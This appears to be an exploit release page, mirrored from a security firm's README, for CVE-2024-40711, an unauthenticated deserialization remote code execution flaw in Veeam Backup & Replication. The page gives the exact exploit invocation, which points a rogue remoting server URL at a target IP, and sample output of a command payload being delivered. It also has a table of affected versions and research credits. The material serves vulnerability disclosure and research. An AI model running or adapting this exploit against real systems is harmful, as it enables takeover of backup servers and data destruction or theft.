Share
## https://sploitus.com/exploit?id=DA0837C4-50E4-51A9-80F9-5A87E066B33F
# CVE-2024-40711
 Exploit for Veeam backup and Replication Pre-Auth Deserialization CVE-2024-40711
 
 See our [blog post](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/) for technical details
 



https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70



# PoC in Action


```
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
```

# Florian Hauser
This vulnerability was found by Florian Hauser ([@frycos](https://x.com/frycos)) of CODE WHITE GmbH ([@codewhitesec](https://x.com/codewhitesec)). Make sure to follow his outstanding research, our role was to only recreate and develop the exploit for this issue.

# Affected Versions

| Version            | Status                                                                                       |
|--------------------|----------------------------------------------------------------------------------------------|
| 12.2.0.334         | Fully patched. Not affected by the vulnerabilities in this blogpost.                         |
| 12.1.2.172         | Affected, but exploitation requires authentication. Low privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE.                                                         |


# Exploit authors

This exploit was written by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber) 

We'd also like to take the opportunity to thank [Soroush Dalili](https://x.com/irsdl) for his help with this exploit.


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
- https://github.com/codewhitesec/RogueRemotingServer
- https://github.com/tyranid/ExploitRemotingService
- https://www.veeam.com/kb4649